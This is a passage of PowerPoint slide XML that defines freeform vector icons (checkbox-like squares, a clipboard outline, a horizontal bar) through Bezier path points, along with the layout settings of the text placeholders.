                    <a:pt x="419" y="80"/>
                    <a:pt x="409" y="90"/>
                    <a:pt x="396" y="90"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="384" y="90"/>
                    <a:pt x="374" y="80"/>
                    <a:pt x="374" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="374" y="22"/>
                    <a:pt x="374" y="22"/>
                    <a:pt x="374" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="374" y="10"/>
                    <a:pt x="364" y="0"/>
                    <a:pt x="351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260" y="0"/>
                    <a:pt x="250" y="10"/>
                    <a:pt x="250" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="250" y="67"/>
                    <a:pt x="250" y="67"/>
                    <a:pt x="250" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="250" y="80"/>
                    <a:pt x="239" y="90"/>
                    <a:pt x="227" y="90"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="215" y="90"/>
                    <a:pt x="205" y="80"/>
                    <a:pt x="205" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="205" y="22"/>
                    <a:pt x="205" y="22"/>
                    <a:pt x="205" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="205" y="10"/>
                    <a:pt x="194" y="0"/>
                    <a:pt x="182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203"/>
                    <a:pt x="10" y="213"/>
                    <a:pt x="23" y="213"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="213"/>
                    <a:pt x="45" y="203"/>
                    <a:pt x="45" y="191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48"/>
                    <a:pt x="48" y="45"/>
                    <a:pt x="53" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="45"/>
                    <a:pt x="160" y="45"/>
                    <a:pt x="160" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="67"/>
                    <a:pt x="160" y="67"/>
                    <a:pt x="160" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="105"/>
                    <a:pt x="190" y="135"/>
                    <a:pt x="227" y="135"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="264" y="135"/>
                    <a:pt x="295" y="105"/>
                    <a:pt x="295" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="295" y="45"/>
                    <a:pt x="295" y="45"/>
                    <a:pt x="295" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="329" y="45"/>
                    <a:pt x="329" y="45"/>
                    <a:pt x="329" y="45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105"/>
                    <a:pt x="359" y="135"/>
                    <a:pt x="396" y="135"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="433" y="135"/>
                    <a:pt x="464" y="105"/>
                    <a:pt x="464" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="464" y="45"/>
                    <a:pt x="464" y="45"/>
                    <a:pt x="464" y="45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8" y="67"/>
                    <a:pt x="498" y="67"/>
                    <a:pt x="498" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="498" y="105"/>
                    <a:pt x="528" y="135"/>
                    <a:pt x="566" y="135"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="603" y="135"/>
                    <a:pt x="633" y="105"/>
                    <a:pt x="633" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="633" y="45"/>
                    <a:pt x="633" y="45"/>
                    <a:pt x="633" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="667" y="45"/>
                    <a:pt x="667" y="45"/>
                    <a:pt x="667" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="667" y="67"/>
                    <a:pt x="667" y="67"/>
                    <a:pt x="667" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="667" y="105"/>
                    <a:pt x="698" y="135"/>
                    <a:pt x="735" y="135"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="772" y="135"/>
                    <a:pt x="802" y="105"/>
                    <a:pt x="802" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="802" y="45"/>
                    <a:pt x="802" y="45"/>
                    <a:pt x="802" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="836" y="45"/>
                    <a:pt x="836" y="45"/>
                    <a:pt x="836" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="836" y="67"/>
                    <a:pt x="836" y="67"/>
                    <a:pt x="836" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="836" y="105"/>
                    <a:pt x="867" y="135"/>
                    <a:pt x="904" y="135"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="941" y="135"/>
                    <a:pt x="971" y="105"/>
                    <a:pt x="971" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="971" y="45"/>
                    <a:pt x="971" y="45"/>
                    <a:pt x="971" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1079" y="45"/>
                    <a:pt x="1079" y="45"/>
                    <a:pt x="1079" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1083" y="45"/>
                    <a:pt x="1086" y="48"/>
                    <a:pt x="1086" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1086" y="1248"/>
                    <a:pt x="1086" y="1248"/>
                    <a:pt x="1086" y="1248"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1086" y="1260"/>
                    <a:pt x="1096" y="1270"/>
                    <a:pt x="1109" y="1270"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1121" y="1270"/>
                    <a:pt x="1131" y="1260"/>
                    <a:pt x="1131" y="1248"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1131" y="52"/>
                    <a:pt x="1131" y="52"/>
                    <a:pt x="1131" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1131" y="24"/>
                    <a:pt x="1107" y="0"/>
                    <a:pt x="1079" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1079" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1079" y="0"/>
                    <a:pt x="1079" y="0"/>
                    <a:pt x="1079" y="0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8" name="Freeform 89">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A7D55CA-AF3C-4617-A9C5-C8837B4101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2814321"/>
              <a:ext cx="87313" cy="77788"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 53 w 313"/>
                <a:gd name="T1" fmla="*/ 275 h 275"/>
                <a:gd name="T2" fmla="*/ 223 w 313"/>
                <a:gd name="T3" fmla="*/ 275 h 275"/>
                <a:gd name="T4" fmla="*/ 276 w 313"/>
                <a:gd name="T5" fmla="*/ 222 h 275"/>
                <a:gd name="T6" fmla="*/ 276 w 313"/>
                <a:gd name="T7" fmla="*/ 96 h 275"/>
                <a:gd name="T8" fmla="*/ 305 w 313"/>
                <a:gd name="T9" fmla="*/ 67 h 275"/>
                <a:gd name="T10" fmla="*/ 304 w 313"/>
                <a:gd name="T11" fmla="*/ 35 h 275"/>
                <a:gd name="T12" fmla="*/ 273 w 313"/>
                <a:gd name="T13" fmla="*/ 35 h 275"/>
                <a:gd name="T14" fmla="*/ 223 w 313"/>
                <a:gd name="T15" fmla="*/ 0 h 275"/>
                <a:gd name="T16" fmla="*/ 53 w 313"/>
                <a:gd name="T17" fmla="*/ 0 h 275"/>
                <a:gd name="T18" fmla="*/ 0 w 313"/>
                <a:gd name="T19" fmla="*/ 52 h 275"/>
                <a:gd name="T20" fmla="*/ 0 w 313"/>
                <a:gd name="T21" fmla="*/ 222 h 275"/>
                <a:gd name="T22" fmla="*/ 53 w 313"/>
                <a:gd name="T23" fmla="*/ 275 h 275"/>
                <a:gd name="T24" fmla="*/ 45 w 313"/>
                <a:gd name="T25" fmla="*/ 52 h 275"/>
                <a:gd name="T26" fmla="*/ 53 w 313"/>
                <a:gd name="T27" fmla="*/ 45 h 275"/>
                <a:gd name="T28" fmla="*/ 223 w 313"/>
                <a:gd name="T29" fmla="*/ 45 h 275"/>
                <a:gd name="T30" fmla="*/ 231 w 313"/>
                <a:gd name="T31" fmla="*/ 52 h 275"/>
                <a:gd name="T32" fmla="*/ 231 w 313"/>
                <a:gd name="T33" fmla="*/ 77 h 275"/>
                <a:gd name="T34" fmla="*/ 156 w 313"/>
                <a:gd name="T35" fmla="*/ 153 h 275"/>
                <a:gd name="T36" fmla="*/ 96 w 313"/>
                <a:gd name="T37" fmla="*/ 109 h 275"/>
                <a:gd name="T38" fmla="*/ 65 w 313"/>
                <a:gd name="T39" fmla="*/ 113 h 275"/>
                <a:gd name="T40" fmla="*/ 69 w 313"/>
                <a:gd name="T41" fmla="*/ 145 h 275"/>
                <a:gd name="T42" fmla="*/ 145 w 313"/>
                <a:gd name="T43" fmla="*/ 201 h 275"/>
                <a:gd name="T44" fmla="*/ 158 w 313"/>
                <a:gd name="T45" fmla="*/ 205 h 275"/>
                <a:gd name="T46" fmla="*/ 175 w 313"/>
                <a:gd name="T47" fmla="*/ 199 h 275"/>
                <a:gd name="T48" fmla="*/ 231 w 313"/>
                <a:gd name="T49" fmla="*/ 142 h 275"/>
                <a:gd name="T50" fmla="*/ 231 w 313"/>
                <a:gd name="T51" fmla="*/ 222 h 275"/>
                <a:gd name="T52" fmla="*/ 223 w 313"/>
                <a:gd name="T53" fmla="*/ 230 h 275"/>
                <a:gd name="T54" fmla="*/ 53 w 313"/>
                <a:gd name="T55" fmla="*/ 230 h 275"/>
                <a:gd name="T56" fmla="*/ 45 w 313"/>
                <a:gd name="T57" fmla="*/ 222 h 275"/>
                <a:gd name="T58" fmla="*/ 45 w 313"/>
                <a:gd name="T59" fmla="*/ 52 h 275"/>
                <a:gd name="T60" fmla="*/ 45 w 313"/>
                <a:gd name="T61" fmla="*/ 52 h 275"/>
                <a:gd name="T62" fmla="*/ 45 w 313"/>
                <a:gd name="T63" fmla="*/ 5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3" h="275">
                  <a:moveTo>
                    <a:pt x="53" y="275"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="223" y="275"/>
                    <a:pt x="223" y="275"/>
                    <a:pt x="223" y="275"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="252" y="275"/>
                    <a:pt x="276" y="251"/>
                    <a:pt x="276" y="222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13" y="58"/>
                    <a:pt x="313" y="44"/>
                    <a:pt x="304" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="296" y="26"/>
                    <a:pt x="282" y="26"/>
                    <a:pt x="273" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="266" y="14"/>
                    <a:pt x="246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251"/>
                    <a:pt x="24" y="275"/>
                    <a:pt x="53" y="275"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="45" y="52"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="48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8"/>
                    <a:pt x="231" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="231" y="77"/>
                    <a:pt x="231" y="77"/>
                    <a:pt x="231" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="156" y="153"/>
                    <a:pt x="156" y="153"/>
                    <a:pt x="156" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="96" y="109"/>
                    <a:pt x="96" y="109"/>
                    <a:pt x="96" y="109"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="101"/>
                    <a:pt x="72" y="103"/>
                    <a:pt x="65" y="113"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="123"/>
                    <a:pt x="59" y="137"/>
                    <a:pt x="69" y="145"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="201"/>
                    <a:pt x="145" y="201"/>
                    <a:pt x="145" y="201"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="149" y="204"/>
                    <a:pt x="154" y="205"/>
                    <a:pt x="158" y="205"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="164" y="205"/>
                    <a:pt x="170" y="203"/>
                    <a:pt x="175" y="199"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="231" y="142"/>
                    <a:pt x="231" y="142"/>
                    <a:pt x="231" y="142"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="231" y="222"/>
                    <a:pt x="231" y="222"/>
                    <a:pt x="231" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="231" y="227"/>
                    <a:pt x="227" y="230"/>
                    <a:pt x="223" y="230"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="230"/>
                    <a:pt x="53" y="230"/>
                    <a:pt x="53" y="230"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="230"/>
                    <a:pt x="45" y="227"/>
                    <a:pt x="45" y="222"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="45" y="52"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="45" y="52"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="52"/>
                    <a:pt x="45" y="52"/>
                    <a:pt x="45" y="52"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="CF022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39" name="Freeform 90">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0B41397-B894-4EA5-809D-1178CAB5F1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2922271"/>
              <a:ext cx="76200" cy="77788"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 276"/>
                <a:gd name="T1" fmla="*/ 223 h 276"/>
                <a:gd name="T2" fmla="*/ 53 w 276"/>
                <a:gd name="T3" fmla="*/ 276 h 276"/>
                <a:gd name="T4" fmla="*/ 223 w 276"/>
                <a:gd name="T5" fmla="*/ 276 h 276"/>
                <a:gd name="T6" fmla="*/ 276 w 276"/>
                <a:gd name="T7" fmla="*/ 223 h 276"/>
                <a:gd name="T8" fmla="*/ 276 w 276"/>
                <a:gd name="T9" fmla="*/ 53 h 276"/>
                <a:gd name="T10" fmla="*/ 223 w 276"/>
                <a:gd name="T11" fmla="*/ 0 h 276"/>
                <a:gd name="T12" fmla="*/ 53 w 276"/>
                <a:gd name="T13" fmla="*/ 0 h 276"/>
                <a:gd name="T14" fmla="*/ 0 w 276"/>
                <a:gd name="T15" fmla="*/ 53 h 276"/>
                <a:gd name="T16" fmla="*/ 0 w 276"/>
                <a:gd name="T17" fmla="*/ 223 h 276"/>
                <a:gd name="T18" fmla="*/ 45 w 276"/>
                <a:gd name="T19" fmla="*/ 53 h 276"/>
                <a:gd name="T20" fmla="*/ 53 w 276"/>
                <a:gd name="T21" fmla="*/ 45 h 276"/>
                <a:gd name="T22" fmla="*/ 223 w 276"/>
                <a:gd name="T23" fmla="*/ 45 h 276"/>
                <a:gd name="T24" fmla="*/ 231 w 276"/>
                <a:gd name="T25" fmla="*/ 53 h 276"/>
                <a:gd name="T26" fmla="*/ 231 w 276"/>
                <a:gd name="T27" fmla="*/ 223 h 276"/>
                <a:gd name="T28" fmla="*/ 223 w 276"/>
                <a:gd name="T29" fmla="*/ 231 h 276"/>
                <a:gd name="T30" fmla="*/ 53 w 276"/>
                <a:gd name="T31" fmla="*/ 231 h 276"/>
                <a:gd name="T32" fmla="*/ 45 w 276"/>
                <a:gd name="T33" fmla="*/ 223 h 276"/>
                <a:gd name="T34" fmla="*/ 45 w 276"/>
                <a:gd name="T35" fmla="*/ 53 h 276"/>
                <a:gd name="T36" fmla="*/ 45 w 276"/>
                <a:gd name="T37" fmla="*/ 53 h 276"/>
                <a:gd name="T38" fmla="*/ 45 w 276"/>
                <a:gd name="T39" fmla="*/ 53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6" h="276">
                  <a:moveTo>
                    <a:pt x="0" y="223"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="252"/>
                    <a:pt x="24" y="276"/>
                    <a:pt x="53" y="276"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="223" y="276"/>
                    <a:pt x="223" y="276"/>
                    <a:pt x="223" y="276"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="252" y="276"/>
                    <a:pt x="276" y="252"/>
                    <a:pt x="276" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="276" y="53"/>
                    <a:pt x="276" y="53"/>
                    <a:pt x="276" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="276" y="24"/>
                    <a:pt x="252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4"/>
                    <a:pt x="0" y="53"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="223"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="45" y="53"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="49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9"/>
                    <a:pt x="231" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="231" y="223"/>
                    <a:pt x="231" y="223"/>
                    <a:pt x="231" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="231" y="227"/>
                    <a:pt x="227" y="231"/>
                    <a:pt x="223" y="231"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="231"/>
                    <a:pt x="53" y="231"/>
                    <a:pt x="53" y="231"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="231"/>
                    <a:pt x="45" y="227"/>
                    <a:pt x="45" y="223"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="45" y="53"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="45" y="53"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="53"/>
                    <a:pt x="45" y="53"/>
                    <a:pt x="45" y="53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0" name="Freeform 91">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE0FEDEE-711B-4372-B495-8CA32D6ECC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392793" y="3030221"/>
              <a:ext cx="76200" cy="77788"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 276"/>
                <a:gd name="T1" fmla="*/ 223 h 275"/>
                <a:gd name="T2" fmla="*/ 53 w 276"/>
                <a:gd name="T3" fmla="*/ 275 h 275"/>
                <a:gd name="T4" fmla="*/ 223 w 276"/>
                <a:gd name="T5" fmla="*/ 275 h 275"/>
                <a:gd name="T6" fmla="*/ 276 w 276"/>
                <a:gd name="T7" fmla="*/ 223 h 275"/>
                <a:gd name="T8" fmla="*/ 276 w 276"/>
                <a:gd name="T9" fmla="*/ 52 h 275"/>
                <a:gd name="T10" fmla="*/ 223 w 276"/>
                <a:gd name="T11" fmla="*/ 0 h 275"/>
                <a:gd name="T12" fmla="*/ 53 w 276"/>
                <a:gd name="T13" fmla="*/ 0 h 275"/>
                <a:gd name="T14" fmla="*/ 0 w 276"/>
                <a:gd name="T15" fmla="*/ 52 h 275"/>
                <a:gd name="T16" fmla="*/ 0 w 276"/>
                <a:gd name="T17" fmla="*/ 223 h 275"/>
                <a:gd name="T18" fmla="*/ 45 w 276"/>
                <a:gd name="T19" fmla="*/ 52 h 275"/>
                <a:gd name="T20" fmla="*/ 53 w 276"/>
                <a:gd name="T21" fmla="*/ 45 h 275"/>
                <a:gd name="T22" fmla="*/ 223 w 276"/>
                <a:gd name="T23" fmla="*/ 45 h 275"/>
                <a:gd name="T24" fmla="*/ 231 w 276"/>
                <a:gd name="T25" fmla="*/ 52 h 275"/>
                <a:gd name="T26" fmla="*/ 231 w 276"/>
                <a:gd name="T27" fmla="*/ 223 h 275"/>
                <a:gd name="T28" fmla="*/ 223 w 276"/>
                <a:gd name="T29" fmla="*/ 230 h 275"/>
                <a:gd name="T30" fmla="*/ 53 w 276"/>
                <a:gd name="T31" fmla="*/ 230 h 275"/>
                <a:gd name="T32" fmla="*/ 45 w 276"/>
                <a:gd name="T33" fmla="*/ 223 h 275"/>
                <a:gd name="T34" fmla="*/ 45 w 276"/>
                <a:gd name="T35" fmla="*/ 52 h 275"/>
                <a:gd name="T36" fmla="*/ 45 w 276"/>
                <a:gd name="T37" fmla="*/ 52 h 275"/>
                <a:gd name="T38" fmla="*/ 45 w 276"/>
                <a:gd name="T39" fmla="*/ 52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6" h="275">
                  <a:moveTo>
                    <a:pt x="0" y="223"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="252"/>
                    <a:pt x="24" y="275"/>
                    <a:pt x="53" y="275"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="223" y="275"/>
                    <a:pt x="223" y="275"/>
                    <a:pt x="223" y="275"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="252" y="275"/>
                    <a:pt x="276" y="252"/>
                    <a:pt x="276" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="276" y="52"/>
                    <a:pt x="276" y="52"/>
                    <a:pt x="276" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="276" y="23"/>
                    <a:pt x="252" y="0"/>
                    <a:pt x="22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24" y="0"/>
                    <a:pt x="0" y="23"/>
                    <a:pt x="0" y="52"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="223"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="45" y="52"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="48"/>
                    <a:pt x="49" y="45"/>
                    <a:pt x="53" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="223" y="45"/>
                    <a:pt x="223" y="45"/>
                    <a:pt x="223" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="227" y="45"/>
                    <a:pt x="231" y="48"/>
                    <a:pt x="231" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="231" y="223"/>
                    <a:pt x="231" y="223"/>
                    <a:pt x="231" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="231" y="227"/>
                    <a:pt x="227" y="230"/>
                    <a:pt x="223" y="230"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="230"/>
                    <a:pt x="53" y="230"/>
                    <a:pt x="53" y="230"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="230"/>
                    <a:pt x="45" y="227"/>
                    <a:pt x="45" y="223"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="45" y="52"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="45" y="52"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="52"/>
                    <a:pt x="45" y="52"/>
                    <a:pt x="45" y="52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1" name="Freeform 92">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{584AB818-CEB4-461F-B1E3-4C9606B72E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830196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2" name="Freeform 93">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B127501B-E74C-47EC-80B9-9728558D93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8635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3" name="Freeform 94">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99CAF77A-EADD-4C3E-95AB-65D3B6318C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9397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2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2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4"/>
                    <a:pt x="477" y="22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4" name="Freeform 95">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AC02842-8175-49C4-84AE-009181583C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2973071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2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2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4"/>
                    <a:pt x="477" y="22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5" name="Freeform 96">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{302D8281-F8DE-49EB-A2EA-E69EDD1B45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3046096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  <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="Freeform 97">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA1A288A-B5D2-4242-B432-78ECED9B5D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37218" y="3079433"/>
              <a:ext cx="133350" cy="12700"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 23 w 477"/>
                <a:gd name="T1" fmla="*/ 45 h 45"/>
                <a:gd name="T2" fmla="*/ 455 w 477"/>
                <a:gd name="T3" fmla="*/ 45 h 45"/>
                <a:gd name="T4" fmla="*/ 477 w 477"/>
                <a:gd name="T5" fmla="*/ 23 h 45"/>
                <a:gd name="T6" fmla="*/ 455 w 477"/>
                <a:gd name="T7" fmla="*/ 0 h 45"/>
                <a:gd name="T8" fmla="*/ 23 w 477"/>
                <a:gd name="T9" fmla="*/ 0 h 45"/>
                <a:gd name="T10" fmla="*/ 0 w 477"/>
                <a:gd name="T11" fmla="*/ 23 h 45"/>
                <a:gd name="T12" fmla="*/ 23 w 477"/>
                <a:gd name="T13" fmla="*/ 45 h 45"/>
                <a:gd name="T14" fmla="*/ 23 w 477"/>
                <a:gd name="T15" fmla="*/ 45 h 45"/>
                <a:gd name="T16" fmla="*/ 23 w 477"/>
                <a:gd name="T17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7" h="45">
                  <a:moveTo>
                    <a:pt x="23" y="45"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="455" y="45"/>
                    <a:pt x="455" y="45"/>
                    <a:pt x="455" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="467" y="45"/>
                    <a:pt x="477" y="35"/>
                    <a:pt x="477" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="477" y="10"/>
                    <a:pt x="467" y="0"/>
                    <a:pt x="45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35"/>
                    <a:pt x="10" y="45"/>
                    <a:pt x="23" y="45"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="23" y="45"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="45"/>
                    <a:pt x="23" y="45"/>
                    <a:pt x="23" y="45"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="55555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 noProof="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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2114BF08-1562-4B7B-A20B-4E6765F92A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5026" y="2660626"/>
            <a:ext cx="2084400" cy="1093857"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="129600">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="180975" indent="-180975">
              <a:defRPr sz="1000"/>
            </a:lvl1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49" name="Text Placeholder 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A323426B-3AD7-45BC-A6DF-9E38AE4282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19136" y="4406387"/>
            <a:ext cx="2084400" cy="1356739"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="129600">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="180975" indent="-180975">
              <a:defRPr sz="1000"/>
            </a:lvl1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5178DCE-E17D-44F9-88DA-5D2FABB9F9A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3486229" y="2372342"/>
            <a:ext cx="3276000" cy="4068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400" b="1" noProof="0">
                <a:solidFill>
